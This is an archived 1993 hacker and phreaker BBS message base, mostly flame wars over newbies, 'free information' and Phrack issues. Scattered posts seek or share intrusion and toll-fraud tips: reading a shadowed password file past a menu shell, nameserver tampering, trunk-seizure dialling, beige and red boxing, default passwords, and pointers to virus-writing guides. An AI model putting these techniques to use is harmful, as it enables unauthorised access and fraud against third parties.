generation, but if they ask a valid question and no one else is answering it, then by all means I will if I can... Burning Chrome From gurujam@yabbs Mon Nov 15 16:49:42 1993 From: gurujam@yabbs To: all@yabbs Subject: re: Learning Date: Mon Nov 15 16:49:42 1993 kiss my grits,cosmos. his one(1) post made a a lot more funking sense than your previous two(2) thread related to my post. i may not fit your "concept" of a hacker,but i can program in every language on the vax i work on. i am not rich enough to own a pc.i barely have enough money to go to college. thank you savoire for your clear head in this matter. (warning: I make no funking sense in general.but I did score eighth in the nation in computional concepts and informtion processing. this is not a boast,but to show that i understand the basics. gurujam From pyro@yabbs Mon Nov 15 17:07:41 1993 From: pyro@yabbs To: all@yabbs Subject: False Ideas Will Kill Date: Mon Nov 15 17:07:41 1993 I personally think the whole idea of a free information society is invalid and dangerous. Information should not be free. It is the, in my opinion, responsibility of each and every individual and organization to protec their own information, and provide for their own privacy. It is not the responsibility of the Government or any other broad based institution to do so for us. As for sharg of information to help everone become more educated. Sure, this idea has much merit. But lets face it, spoon feeding does no one any good. Its a two way street, and to effectively have an excahnge of information in such a public forum you need a number of people on the same intellectual level discussing their views, while a few people may just kick back and watch. But to sit here and read stupid wuestions non-stop all day is annoying. I hate one way streets, and I know a number of other people do as well. I have better things to do with my time than to tutor a bunch of people who, in my opinion, are too lazt to try and learn anything on their own free will. So, yes, read a book so you have some concept of what you are talking about, then ask questions based on what you have read and what you would like to know more about. But don't simply assume that because there is some false notion of "free information" people are obligated to asnwer any neophyte question that gets posted. Just to carry it a bit farther... Poeple are so consumed with getting resuluts right away. They do not realize that the people in the hack community who do have a large amount of knowledge have been at it for YEARS. They have read every e-zone they have come across, they have read books, met people, scoured UseNet, tried things, etc. Its a LONG PROCESS if you want ot be well rounded. On the other hand, we get people today who feel that it is their right, because of this stupid notion of foree information, to know everything that the old elite may know. Wrong. Knowledge cannot be spoon fed into brains full of much. Each indiviidual must take the task of learning to heart and put as much in to it, and even MORE in to it, than those they would have teach them. Simple. Well, yet another long post from me. And filled with typos too. Neat-0, huh? -The Pyro From gh0d@yabbs Mon Nov 15 17:52:10 1993 From: gh0d@yabbs To: all@yabbs Subject: packet sorter Date: Mon Nov 15 17:52:10 1993 Anyone have any source to sort packets into sessions? I'm talking raw packets here. Also, can anyone recommend sources online that explain different protocols, discuss tcp/ip packets in detail(ICMP, arp, ..) the nine yards. anything, I here about all this talk about 'old elites' being on here. So, bring on the telco guys, let's discuss. s/here/hear From gh0d@yabbs Mon Nov 15 17:59:04 1993 From: gh0d@yabbs To: all@yabbs Subject: Ethernet ODI stuff Date: Mon Nov 15 17:59:04 1993 Anyone mess with ODI drivers for your ethernet card on your IBM? If so, send me all that source you have! ;-) .. I just need source to throw it into promiscuous mode and you know the rest. try mailing if you dont feel like puting it here. From jmac@yabbs Mon Nov 15 19:47:42 1993 From: jmac@yabbs To: all@yabbs Subject: Trillian... Date: Mon Nov 15 19:47:42 1993 What's the deal with Somehow I cannot use the guest acct. anymore. Jesus, I've lost access to the only two boards which gave me any sort of access to INet. Great. Oh yeah, I need access to CMU.EDU by the weekend.. From jmac@yabbs Mon Nov 15 19:53:28 1993 From: jmac@yabbs To: all@yabbs Subject: CTS2 Date: Mon Nov 15 19:53:28 1993 Anybody know what a "CTS2 >" prompt is running on. I just got a password for this dialup but I can't seem to get anything running. When I use the "Connect " command, it finds the address, and then tells me my connection was refused by host. What is the deal with this system? Thanks. From dux@yabbs Mon Nov 15 19:59:42 1993 From: dux@yabbs To: savoire@yabbs Subject: re: Learning Date: Mon Nov 15 19:59:42 1993 Savoire, I agree with you 100%. Nothing aggravates me more than observing folks I've helped give attitude to others. From binkley@yabbs Mon Nov 15 23:52:02 1993 From: binkley@yabbs To: jmac@yabbs Subject: re: CTS2 Date: Mon Nov 15 23:52:02 1993 I'll bet it's a restricted net server. I found one on an 800 system. no passwords to get in, but iI only found 1 system it would connect to, one that was listed on it... binkley From xela@yabbs Tue Nov 16 21:46:54 1993 From: xela@yabbs To: all@yabbs Subject: help and newbies Date: Tue Nov 16 21:46:54 1993 why is it so difficult for experienced hackers to give newbies a little help when it is neccessary -and- encourage the newbie to read a little, all without the massive attitude problem both cosmos and savoire have? it is possible that the answer lies in the size of ego of each party, so "lighten up." i am a newbie who asks questions and reads. i do fine, even tho' my questions may be annoying to those i ask, but it should be a small matter to read as well. anyways, thats my two cents. -xela From xenon@yabbs Tue Nov 16 22:21:55 1993 From: xenon@yabbs To: xela@yabbs Subject: re: help and newbies Date: Tue Nov 16 22:21:55 1993 I have no problem what-so-ever with helping newbies out...hell, I've been trippin da cyberspace fantastic fer 6 yrs and still consider myself a newbie...theres a shitload of information ta read up on out problem is when sumone thinkin they're gods gift to hackers puts up sum bullshit post askin fer stupid shit. those are the people i tell ta about the past and present ta gain an understandin about da hacker world in general. i am willing to answer questions to da best of my ability. even if it is a "simple" question. its da "stupid" ones i tend ta ignore. fer example, if sumone asks fer help understand how a PBX works and how it can be used, thats ok, but if sumone jus asks fer numbers and passwords, that tells me that theyre not interested in learnin much x-cept how ta make a few free LD calls and mebbe show-off to their friends... tellin sumone HOW a sysem works does not go against my principals, but givin people a free ride ta abuse a system is. my view of a hacker is sumone who wants ta learn the ins and outs of a system not jus how ta use it fer selfish reasons. there are 2 main tools ta this learnin...1) reading. ya gotta read up on yer system. do research on it , learn the basic principals behind how it works so you can move on to the next step: 2) hands on experiance. this is of equal importance as the first step. ya GOTTA play around on a system...find new and interesting ways ta use the system...use that x-periance to teach others and apply it to da next system ya encounter. behind all this learnin, tho, ya gotta have a personal drivin force. the posts i see on here that irk me are the ones by lost people, (no specific goal in mind other than sheer abuse), who are jus lookin fer a free ride. those are the people i tell ta up on the past and apply that x-periance to form sum sort of personal goal...THEN start askin questions and work toward that goal... --> Xenon From gh0d@yabbs Tue Nov 16 23:42:54 1993 From: gh0d@yabbs To: xela@yabbs Subject: re: help and newbies Date: Tue Nov 16 23:42:54 1993 most of the people who ask me about telco havent read any phracks... The only way you might get information from me is if you read all the phracks (telco articles) From cosmos@yabbs Wed Nov 17 06:03:50 1993 From: cosmos@yabbs To: xela@yabbs Subject: re: help and newbies Date: Wed Nov 17 06:03:50 1993 First off, never butt in to something during the middle. Secondly, if you had read from the beginning you would know that this whole argument stemmed from the idotic post of Intruder and others who would ask like...hey how do I hack...and whos got the k0dez. The problem is not my is the 'newbie' unwillingness to accept responsibility for their learning. The new breed today wants it all on a silver platter...I wonder if they can read. Cosmos From wonko@yabbs Wed Nov 17 08:32:18 1993 From: wonko@yabbs To: cosmos@yabbs Subject: re: help and newbies Date: Wed Nov 17 08:32:18 1993 reading is have the fun. not only is it the way for a hacker/phreak to learn it is lots of fun!!!!!!!! if i had half a clue that first have in the first sentance should have been a half instead. duh. anyway, id a good 80% of what i know from reading, then there is the hands on for reinforcement of concepts. why can't i type today?? at least i am thinking somewhat clearly for a fucking change. -wonko From Cagim@yabbs Wed Nov 17 19:21:14 1993 From: Cagim@yabbs To: all@yabbs Subject: re: 40hex Date: Wed Nov 17 19:21:14 1993 It's on the net guys...didya ever try archie?....sheesh IP Address: Along with some other cool info files (ie. NuKe..Phalcon/skisms virus writing guide and a couple of muattion and polymorph engine virus shells.) As far as I'm concerned information should be freely distributed...I say let the chips fall where they You are responsible for your actions not me! BTW Howdy, I'm new to the Net..... From Cagim@yabbs Wed Nov 17 19:32:53 1993 From: Cagim@yabbs To: all@yabbs Subject: re: 40hex Date: Wed Nov 17 19:32:53 1993 Oh yeah, try /pub/mccoy/computer-underground, duh Cagim From tboe@yabbs Thu Nov 18 01:48:17 1993 From: tboe@yabbs To: griton@yabbs Subject: re: VM Date: Thu Nov 18 01:48:17 1993 well, after what I know, it's just no way to do it. From phragger@yabbs Thu Nov 18 07:00:36 1993 From: phragger@yabbs To: gh0d@yabbs Subject: re: packet sorter Date: Thu Nov 18 07:00:36 1993 well, for documentation on different protocols, there is problably quite a lot of stuff on and From jealousy@yabbs Thu Nov 18 11:24:04 1993 From: jealousy@yabbs To: all@yabbs Subject: Date: Thu Nov 18 11:24:04 1993 Hi I am new here and I am a bit confused. Maybe someone could help me. From LordGraf@yabbs Thu Nov 18 11:35:22 1993 From: LordGraf@yabbs To: all@yabbs Subject: Date: Thu Nov 18 11:35:22 1993 Does anyone know where I can get a Wardialer Like ToneLoc via FTP? Yes I have tried archie but to no avail. LordGrafx From cosmos@yabbs Thu Nov 18 14:09:54 1993 From: cosmos@yabbs To: xela@yabbs Subject: re: help and newbies Date: Thu Nov 18 14:09:54 1993 Thank you for your insight. Me an my ego thank you. Cosmos From cosmos@yabbs Thu Nov 18 14:12:19 1993 From: cosmos@yabbs To: all@yabbs Subject: Phrack 44 is here Date: Thu Nov 18 14:12:19 1993 Well, Phrack 44 is out and at least some of you should have it, I have perused a few sections(01,03,04) and it is quite good. Of course, my article on PSDN's in section 04 could have something to do with my judgment...:) Check it out... Cosmos From gh0d@yabbs Thu Nov 18 16:12:13 1993 From: gh0d@yabbs To: cosmos@yabbs Subject: re: help and newbies Date: Thu Nov 18 16:12:13 1993 Do you know anything about cosmos? From pyro@yabbs Thu Nov 18 22:09:16 1993 From: pyro@yabbs To: cosmos@yabbs Subject: Phrack Date: Thu Nov 18 22:09:16 1993 Yes, your article was one of the few worth reading, in my opinion. As usaul, Phrack is lareg and boring for the most part. Maybe I should submit something. Its been, oh, 8 years since I last did soething for it... Damn, I need to learn to type. From jimjones@yabbs Fri Nov 19 01:39:27 1993 From: jimjones@yabbs To: all@yabbs Subject: re: Phrack Date: Fri Nov 19 01:39:27 1993 Not so, seems like now it's a litle more interesting. Now that thaat dispater guy is in levinworth or whatever... From cosmos@yabbs Fri Nov 19 04:49:25 1993 From: cosmos@yabbs To: gh0d@yabbs Subject: re: help and newbies Date: Fri Nov 19 04:49:25 1993 what do you need to know... P.S. (I don't know anything, I just have an ego) Cosmos From gh0d@yabbs Fri Nov 19 21:09:13 1993 From: gh0d@yabbs To: cosmos@yabbs Subject: re: help and newbies Date: Fri Nov 19 21:09:13 1993 I was just wondering what telco systems you were familiar with. LMOS, COSMOS, BOSS, PREMIS.. ? From xela@yabbs Sat Nov 20 16:09:13 1993 From: xela@yabbs To: cosmos@yabbs Subject: re: help and newbies Date: Sat Nov 20 16:09:13 1993 I believe you remarked something like this: > P.S. (I don't know anything, I just have an ego) You also said this: > Me and my ego thank you. If at any point during our brief conversation I claimed you were all ego and no knowledge, you may quote and I will gladly leave this bbs. Otherwise stop putting words into my mouth. If anything that shows immaturity, ignorance, and arrogance. Grow up. -Alex From cosmos@yabbs Sun Nov 21 15:25:22 1993 From: cosmos@yabbs To: xela@yabbs Subject: re: help and newbies Date: Sun Nov 21 15:25:22 1993 I was not flaming you per se...just the general attitude towards me. Who put words into your mouth?? I have a rule. I never put anything in anyone's mouth, it's nasty and frankly, can lead to some pretty funky diseases. A public service announcement from your local egotist, Cosmos From TRobber@yabbs Tue Nov 23 11:40:11 1993 From: TRobber@yabbs To: all@yabbs Subject: Phrack Date: Tue Nov 23 11:40:11 1993 I was just wondering where I can get a copy of Phrak -TRobber From Cagim@yabbs Tue Nov 23 13:22:52 1993 From: Cagim@yabbs To: TRobber@yabbs Subject: re: Phrack Date: Tue Nov 23 13:22:52 1993 Hey TRobber, Which copy? I think they're up to 44 now...anyway, try......... under /pub/cud/phrack..... Cagim From Alvin@yabbs Tue Nov 23 15:17:33 1993 From: Alvin@yabbs To: TRobber@yabbs Subject: re: Phrack Date: Tue Nov 23 15:17:33 1993 or try /pub/phrack From TRobber@yabbs Tue Nov 23 15:43:34 1993 From: TRobber@yabbs To: all@yabbs Subject: re: Phrack Date: Tue Nov 23 15:43:34 1993 Thanks for your help, I'll try both... TRobber From HomeySan@yabbs Tue Nov 23 18:01:08 1993 From: HomeySan@yabbs To: all@yabbs Subject: re: Whaz up? Date: Tue Nov 23 18:01:08 1993 well, I have one more channce to plug my bbs, so here it goez.. 1t iz a lam3r b0ard that haz s0m3 r3ally k1ck t3xt (317) 823-8184 I got to up your security and shit, it takes time... (heck, I'm 15 and livbe undermy parents house, its THEIR phone line... so I gotta watch my ass... 14.4k bps v32/42bis c-ya! From jmac@yabbs Tue Nov 23 21:08:50 1993 From: jmac@yabbs To: all@yabbs Subject: Hello.. Date: Tue Nov 23 21:08:50 1993 MPE XL: MPE XL:hello EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424) MPE XL:hello public.library HP3000 RELEASE: B.40.00 USER VERSION: B.40.00 TUE, NOV 23, 1993, 6:01 PM MPE/iX HP31900 B.30.45 Copyright Hewlett-Packard 1987. All Rights Reserved. Does anyone have any idea if there are any other commands in this HELLO shell? Thanks. From schief@yabbs Wed Nov 24 19:19:40 1993 From: schief@yabbs To: all@yabbs Subject: phrack 44 Date: Wed Nov 24 19:19:40 1993 would someone have it in the goodness of their heart to mail me a (preferably compressed in some way) copy of phrack 44? Stormking is apparently never going to send me one itself? Finger me at the main menu for the addr.. From QFX@yabbs Thu Nov 25 18:25:28 1993 From: QFX@yabbs To: jmac@yabbs Subject: re: Hello.. Date: Thu Nov 25 18:25:28 1993 Its a hp3000 and you can use "DATA" and a couple of others just grab a t file on hp3000 QFX From horus@yabbs Thu Nov 25 22:12:19 1993 From: horus@yabbs To: schief@yabbs Subject: re: phrack 44 Date: Thu Nov 25 22:12:19 1993 ftp it off their distribution site /pub/phrack From schief@yabbs Fri Nov 26 14:19:54 1993 From: schief@yabbs To: horus@yabbs Subject: re: phrack 44 Date: Fri Nov 26 14:19:54 1993 it's there? i checked about 2 days ago and it wasn't there then..or so I thought... From horus@yabbs Fri Nov 26 16:50:36 1993 From: horus@yabbs To: schief@yabbs Subject: re: phrack 44 Date: Fri Nov 26 16:50:36 1993 It's there, 380K zipped and over 800K unzipped. Eric likes em big! ;) From iceman@yabbs Fri Nov 26 21:25:21 1993 From: iceman@yabbs To: all@yabbs Subject: SL-1 Date: Fri Nov 26 21:25:21 1993 Comments on the Meridian SL-1 article? Should I have wasted it on Phrack? Alot of people think not. iceman From schief@yabbs Sat Nov 27 11:53:05 1993 From: schief@yabbs To: horus@yabbs Subject: re: phrack 44 Date: Sat Nov 27 11:53:05 1993 yep, i found it... :-) From johndeer@yabbs Mon Nov 29 18:24:00 1993 From: johndeer@yabbs To: all@yabbs Subject: stuff Date: Mon Nov 29 18:24:00 1993 jmac: there's some good t-fi;les on hp-3000, check them out.. i have a feeling that system is fairly closed though.. telephony people: my friend in UK has been able to seize a trunk in hawaii. to tial any US number, he just dials AC and the number (no 1 before the AC). but it won't let him connect ot 800's, or international dial.. i think he's on an ESS switch.. he dials B12+ AC and number + C anyone konw how to get international on this? he's tried 011+country code, and jsut country code, and even tried routing it with 10xxx does, but to no avail.. can anyone help out? johnDeere From DINO@yabbs Wed Dec 1 17:28:37 1993 From: DINO@yabbs To: all@yabbs Subject: Menu Driven unix Date: Wed Dec 1 17:28:37 1993 I was wondering if anyone had any suggestion to bypassing as menu program for a unix host? I need to ypcat the shadowed passd file? not looking to leech info just looking for suggestions? thanks! From rramone@yabbs Thu Dec 2 04:04:30 1993 From: rramone@yabbs To: all@yabbs Subject: Beige Box Date: Thu Dec 2 04:04:30 1993 While inspecting a friend's outside phone box today, I discovered that his is not like mine (ok, duh, I know). Mine is a box that is made by the Telco, and it merely slips off, exposing a set of posts and wires. However, when I opened his, which appeared to be a commercial model, I discovered two posts, but also a modular jack! We then ventured to his neighbor's, where the same set up existed. Also, the box had another section labelled "Telco Access" and required a spec ial key to unscrew it. Is this common, or is it just common in newer subdivisions? I did not even need to use my beige box, I just plugged right in with a regular phone. I have not seen this before, but then I haven't been real observant either. rramone From cosmos@yabbs Thu Dec 2 06:37:49 1993 From: cosmos@yabbs To: rramone@yabbs Subject: re: Beige Box Date: Thu Dec 2 06:37:49 1993 Yes, it seems to be more common. In my area we still run off the green monsters....(the huge green boxes filled with line cabling)...but many newer areas and some older ones now have the jacks... AT&T thought that beige boxing was too hard so they made it easier for all the kiddies to rip them off even more... Cosmos From cosmos@yabbs Thu Dec 2 06:41:52 1993 From: cosmos@yabbs To: all@yabbs Subject: Cosmos 3l33t VMB Date: Thu Dec 2 06:41:52 1993 Well all, if one has a desire or need to contact me outside this BBS, you can call my new VMB. Leave anything you want, but the first person I catch leaving codes is gonna get it(I am talking about calling cards, visa, mastercard, etc...), and please leave something if you hang ups. Cosmos VMB: 1-800-998-KRAD (yes, I am serious here) I am box number COS1 after you are greeted with the "welcome to..." crap, hit the * key and then type my box number. Cosmos From LordGraf@yabbs Thu Dec 2 11:16:46 1993 From: LordGraf@yabbs To: iceman@yabbs Subject: re: SL-1 Date: Thu Dec 2 11:16:46 1993 I though it was pretty good my school uses a meridian system so it helps alot. LordGrafx From deprogra@yabbs Thu Dec 2 15:52:15 1993 From: deprogra@yabbs To: cosmos@yabbs Subject: re: Cosmos 3l33t VMB Date: Thu Dec 2 15:52:15 1993 Cosmos, your posts fall into some clearly defined categories: 1) "The old days are over, and they will never return. Over, never return, got that?! Give up!! I did it all, and I did it better, so how dare you act as if hacking exists in the here and now instead of where we all know it exists, the past of my life. Stop that this instant !" (End fictitious quote) There are lots of people red boxing and even blue boxing, today. Of course these are nothing like the old days. In the old days companies like Sprint were in their infancy, and there was nothing like internet. Now there are new things to hack and new ways to hack them. And the old ways. 2) "If you would just go bacck and read the original posts, then you would know what I was talking about." I've been keeping up with this base for quite a while now and have read every message on it. 3) "Stop talking about that, you're going to get us all in trouble!! And get htoaster's computer seized!" It's htoaster's board, and what he allows on it is his business and his alone. He's taking the risks here and it's up to him to tell people what not to talk about. Periodically, he does this. Futhermore, notice all these [this message marked for deletion] messages? Refer to #2. 4) "Have you seen my article in Phrack? Phrack is great, you should all read it. Whaddaya think, huh, whaddaya think? It's awful large, but tou should all get it and read my article. I write for Phrack, therefore I am hot shit." Yes, I do read Phrack, and I'll get around to your article, but Phrack is too large and too boring and not very useful. The articles on operating systems have much more information than I need, and they appear to be taken straight out of a manual. They should have hung it up at #32 at the latest. Many phreaks argue that it is not really Phrack anymore, that's why #32 was Phrack Classic. 5) "Intruder is a lame warez d00d who can't write or spell" Intruder is struggling to speak English, a foreign language to him! He may appear to be a 14 year old but he is not, don't be such an Anglophone bigot! We have users telnetting in from Europe and Argentina, I think that is COOL. Do you disagree with that?! 6) "ANI is the same as Caller ID, for you newbies" Okay, seriously, you must have been oversimplifying. You just gotta know better than that. ANI is used by operators and by 800 numbers to determine the calling number, like when you get a collect call. CLID is sent by the switch to the customer in areas where it's available. CLID is a product they're trying to sell. 7) "3l33t VMB: 1800-998-KRAD" After all your bitching about WaReZ D00dZ you do this... \ I hate to add to the flame fest here, but cosmos's worthless egotistical rigamarole has already sent this message base to pot. Next he'll be telling us not to talk about dialouts, i suppose. Eat shit, cosmos. From Keman@yabbs Thu Dec 2 16:25:36 1993 From: Keman@yabbs To: deprogra@yabbs Subject: re: Cosmos 3l33t VMB Date: Thu Dec 2 16:25:36 1993 Someone who actually has intelligence?? it can't be.... Grin, I agree with you 100 % From xenon@yabbs Thu Dec 2 16:38:14 1993 From: xenon@yabbs To: rramone@yabbs Subject: re: Beige Box Date: Thu Dec 2 16:38:14 1993 ummm...those type o boxes have been around this area fer quite a while... all thats inside that area ya need a special screwdriver, (i think i used my swiss army knife), is da wires coming in from da switchin box and da wires goin out ta whatcha see in the other half o the box. sum telco people will sign da inside of the box a special one ive seen is a drawin of woody-woodpecker.... --> Xenon From horus@yabbs Thu Dec 2 16:45:15 1993 From: horus@yabbs To: deprogra@yabbs Subject: re: Cosmos 3l33t VMB Date: Thu Dec 2 16:45:15 1993 Bravo, I agree. There are no Good Old Days, just a bunch of burnt out lamers, that plariarize manuals, Cosmos why don't you do something worth while like a How-To. Anyway there are alot more exciting things in HP than there ewere in the 70/80's , going on right now From cosmos@yabbs Thu Dec 2 19:36:47 1993 From: cosmos@yabbs To: deprogra@yabbs Subject: re: Cosmos 3l33t VMB Date: Thu Dec 2 19:36:47 1993 Ohhh...flamed. When did I denounce red boxing as dead? I dont recall it, shit I use mine daily. Blue Boxing, out of country is still possible and if you live in hicksville on an old baby bell mechanical switch maybe. Actually, you need to perhaps look for something in English called sarcasm, I think you will find it in my posts. As for intruder, I could give a shit less whether he speaks english or not, he still misses the point entirely. And 32 still sucked...24-26 were the last good ones. Thank you for your long, politically correct, insightful flame. Back to your hole now. Cosmos From cosmos@yabbs Thu Dec 2 19:39:39 1993 From: cosmos@yabbs To: horus@yabbs Subject: re: Cosmos 3l33t VMB Date: Thu Dec 2 19:39:39 1993 I got one coming up, its entitled, "How-To Join the Flame Bandwagon and Sound Like I am Cool." Depovera or whatever his handle is at least layed out the knowledge in his flame, you, there is no hope. Go kiss ass somewhere else. Cosmos From pyro@yabbs Fri Dec 3 01:50:39 1993 From: pyro@yabbs To: cosmos@yabbs Subject: re: Cosmos 3l33t VMB Date: Fri Dec 3 01:50:39 1993 Hehehe... Lets face it Cosmos, we are right and they are wrong. Their jealousy just forces them to try and have the balls out fun we used to have in the early 80's. Jealous I say, jealous. Its very simple. Really. -TP From cosmos@yabbs Fri Dec 3 05:15:36 1993 From: cosmos@yabbs To: pyro@yabbs Subject: re: Cosmos 3l33t VMB Date: Fri Dec 3 05:15:36 1993 Yeah, I should say so. The New Hacker: Cosmos From pegasus@yabbs Fri Dec 3 10:55:05 1993 From: pegasus@yabbs To: all@yabbs Subject: Phalcom/skism Date: Fri Dec 3 10:55:05 1993 From someplace i got this text: If you likethis stuff contact The Phalcon/Skism Internet site for more info. Does anyone know whre theis i-net site is? -Pegasus From Cagim@yabbs Fri Dec 3 13:41:40 1993 From: Cagim@yabbs To: pegasus@yabbs Subject: re: 40hex Date: Fri Dec 3 13:41:40 1993 Sheeesh! IP= under /pub/mccoy/computer-underground Cagim From K0der@yabbs Fri Dec 3 14:25:51 1993 From: K0der@yabbs To: deprogra@yabbs Subject: Lamer Date: Fri Dec 3 14:25:51 1993 You are pathetic deprogra, you do not know which end is up...I'll bet you spent the whole time reading the thread to figure out how to write that post and sound like you know something. You eat shit, moron. I speak for myself and many other people who share Cosmos and Pyros line of hacking philosophy: Learn from yourself, do not expect it on a platter.. As for you horus, you are plain worthless. You wouldnt recognize a hack if it came up and bit your lame ass. From deprogra@yabbs Fri Dec 3 17:11:56 1993 From: deprogra@yabbs To: K0der@yabbs Subject: re: Lamer Date: Fri Dec 3 17:11:56 1993 Okay, fine, so we hack because we are jealous. It would be cool if you could still turn on auto hacker, leave it running all day and come home to a printout of codes. No, honest, I'm sure the old days were great. Pardon me for not giving up and waxing nostalgic about history. Scuze me for not staring in awe at people like you. I obviously flamed cosmos with both barrels, saying while I did so that I hate to add to the already copius flamage around here. Notice how this debate is detracting from any constructive discussion around here? If you think a question is stupid, ignore it, see if someone else lowers themselves to respond... The attitude around here has turned into a squelching of discourse. Is Phrack zipped with PKZIP anywhere? I think it is usually gnu zip, right? Deprogram [That is my handle, it is 1 character too long to be a username here.] From abort@yabbs Fri Dec 3 18:28:30 1993 From: abort@yabbs To: K0der@yabbs Subject: re: Lamer Date: Fri Dec 3 18:28:30 1993 Who is the guy wasting his time replying like I am to such stoopid splooge? JK0der you are a loser if you believe that raggin on newbies will make you hackG0D of yabbs, which is on the same campus as CERT is centered. Yep jus K-rad you are. I dont care hold old time you or Cosmos is unless you have soul you dont mean shit too me. I dont mean "soul" as in souls-food but I mean actuall action not speaking about how old timer you are and jus how K-rad the ole days wee. Drop the WaReZ D00D attitude and get with reality. Do you reallythink that your hacking is gonna have a affect on the way American Govt monopolizes info, or the way media controls society thru info. I think not man. So grow up and cathc the next boat to reality. There is no such thing as a ole-timer anymore, its hacker, or hacker, not newbie, oldster. Hell why dont you put your illusive talents to use and see if you can track my account down and send me email, I bet you cant even do that. From Maedhros@yabbs Fri Dec 3 20:00:07 1993 From: Maedhros@yabbs To: all@yabbs Subject: re: Lamer Date: Fri Dec 3 20:00:07 1993 Hey guys, get the hell off of abort and deprogra's backs. If you want to spout your idealistic dogma come on off this board and into 'anarchy'. These people are trying to learn something, it's pretty damn low to talk down to someone who's trying to learn. If you want to flame, come on over, we live for this kinda shit. But for God's sake, if there is one, leave them the hell alone! Maedhros /\ / \ /----\ Alas, if all Rome had / \ but one head. -Caligula From cosmos@yabbs Sat Dec 4 15:19:55 1993 From: cosmos@yabbs To: deprogra@yabbs Subject: re: Lamer Date: Sat Dec 4 15:19:55 1993 Enough Deprogram. You have your philosophy, I have mine. Anyways, it is pkzipped on least 43 and 44 are. The rest are gnu compressed. Cosmos From cosmos@yabbs Sat Dec 4 15:23:41 1993 From: cosmos@yabbs To: abort@yabbs Subject: re: Lamer Date: Sat Dec 4 15:23:41 1993 Um, abort he is not a warez dude like you state. While, I think that perhaps my little friend there went way off on a tangent, he is not warez. Anyways, what dope are you smoking?? Where did the government come into this flame war?? Who cares about the government, not me. Just ignore em. I aint postin no more shit on this topic anymore. Cosmos From cosmos@yabbs Sat Dec 4 15:24:32 1993 From: cosmos@yabbs To: Maedhros@yabbs Subject: re: Lamer Date: Sat Dec 4 15:24:32 1993 Not even worth the time to comment... Cosmos From phantacc@yabbs Sat Dec 4 15:25:34 1993 From: phantacc@yabbs To: jmac@yabbs Subject: re: Hello.. Date: Sat Dec 4 15:25:34 1993 Moron... is an hp-3000 running mpe. Its not a HELLO shell (what the fuck would a HELLO shell be anyway!?!?). Get some t-files and read the default passwords for an hp-3000. From phantacc@yabbs Sat Dec 4 15:27:02 1993 From: phantacc@yabbs To: jmac@yabbs Subject: re: stuff Date: Sat Dec 4 15:27:02 1993 oh yeah... BTW hp-3000 are usually ownd by state run facilities. From jmac@yabbs Sat Dec 4 17:39:50 1993 From: jmac@yabbs To: phantacc@yabbs Subject: re: Hello.. Date: Sat Dec 4 17:39:50 1993 What the hell are you whining about now? Jesus. From horus@yabbs Sat Dec 4 18:18:08 1993 From: horus@yabbs To: cosmos@yabbs Subject: whine whine whine Date: Sat Dec 4 18:18:08 1993 You haven't got the slightest idea do you cosmos? I was hacking back when you were still in diapers. I went to school with the four guys that came up with the Altair 8080 , so drop the Elite shit, your just anothe r r0dent to me. You didn't come on the scene until after I had burnt and come back to both H&P at least four times and over 15 years. Pyro, you're getting just as bad as cosoms. They are at least tten times as many types of phreaking, and hundreds of types of hacking today than there were in the 80's. Shit I remeber the article in pop electronics abvout blue boxes in the 80's than got teenie boopers like you started. IT SAID PHRESKING WAS DEAD! From abort@yabbs Sat Dec 4 21:44:43 1993 From: abort@yabbs To: all@yabbs Subject: now ofr something entirely Date: Sat Dec 4 21:44:43 1993 Well, now that we got the pleasentries out of the way and all have established their place in the pecking order lets go on to something a bit more educational. Now say you were at a dialup fo rthe local uni. it will let you telnet, but only to machines in that "net" as they like to call it. Now i have already done fakemail and all that stuff, and even some other shit, but I was wondering, say if I got into the nameserver for this place could I possibley place a few sites on itthat are outside of its normal area of service? I would have annonimity that way, since now I need to use borrowed accounts on the local uni machines sometimes to get what I need done. From EON@yabbs Sun Dec 5 00:32:44 1993 From: EON@yabbs To: Maedhros@yabbs Subject: re: Lamer Date: Sun Dec 5 00:32:44 1993 I agree with you man Why the hell people flame people who will quite possably be a good asset in the h/p society of ours becids we need all the people we can get with out new people there are no new idears and with out idears what are we ?? People followin a ollowing a strict set of guide lines we haver to act like this we have to talk like that but with new idears we might just find that a breth of fresh air might appear in the h/p scene PS . sorry about any typos the lag on this is terible somethink like 2 secs From phragger@yabbs Sun Dec 5 09:39:31 1993 From: phragger@yabbs To: Keman@yabbs Subject: re: Cosmos 3l33t VMB Date: Sun Dec 5 09:39:31 1993 take this flamewar of yours elsewhere. then eat shit. and no. i`m not referring to cosmo. get a sense of humor too. it might help. maybe. From cosmos@yabbs Sun Dec 5 15:41:13 1993 From: cosmos@yabbs To: horus@yabbs Subject: re: whine whine whine Date: Sun Dec 5 15:41:13 1993 hee hee. Can I have your autograph? Cosmos From cosmos@yabbs Sun Dec 5 17:29:06 1993 From: cosmos@yabbs To: horus@yabbs Subject: re: whine whine whine Date: Sun Dec 5 17:29:06 1993 hee hee, look who's talking now... :) I got a hard on just imagining how 3l33t you are... Have a nice day. Cosmos From pyro@yabbs Sun Dec 5 20:39:41 1993 From: pyro@yabbs To: horus@yabbs Subject: re: whine whine whine Date: Sun Dec 5 20:39:41 1993 My whole point is simple: I am willing to help people who wish to leran something if, and only if, they are up to the challenge of puutting as much or more effort in to learning that I am putting in helping. I am not going to sit here and tell me exactly how to do things, thats not the point. How can anyone expect to learn something by being spoonfed? Lets look back. This whole topic started because some stupid, ignorant little fools were posting shit about needing accounts and how they could easily hack them. I responded with a long post about the problems with asking for such idiot information on a public BBS and that hacking accounts is tupid and inconsequential compared to real hacking. Then a bunch of stupid fucks started babbling about how people like me were holding back some stupid ideas of "the old days" of open sharing and learning. I am sorry, people who asked such questions back then were flamed as they are now. Cosmos then joined in with some excellent posts on the differences between today and 10 years ago and how stupid little kiddies can think they will learn oh so much in 1 week what took many people to learn in many years. If anyone honestly thiks they are going to get some real hacking info from theis subboard on a large public BBS they are wrong. It will not happen. No one in their right mind who knows anything worth knowing is not going to go off and explain in detail anything to anyone here. Wait, thats a double negative. Sorry. Anyone who knows anything is NOT going to spit it out for all the people of the world to read. That is ludicrous. Ideas and discussion are great, but for people to sit here and TEACH people how to hack is just plain stupid. Thats a fact, deal with it. If someone were to ask me a very informed question about somehting they have worked on for quite a while I would answer it. But before you aks a question people should think to themselves: "Do I know what I am talking about? Have I exhausted the resources I have available to me on a personal level? Have I read up on this subject? Can I read more? Is my question informed enough so that those who would answer it are able to withoout getting confused by it?" and may more. Hacking is NOT just getting accounts and using a system. It goes way beyond that, and anyone who truly likes hacking and takes it seriously realizes that it is an intense passion for security and how it works. And not just security, but the system in general. Accounts are a dime a dozen. Any 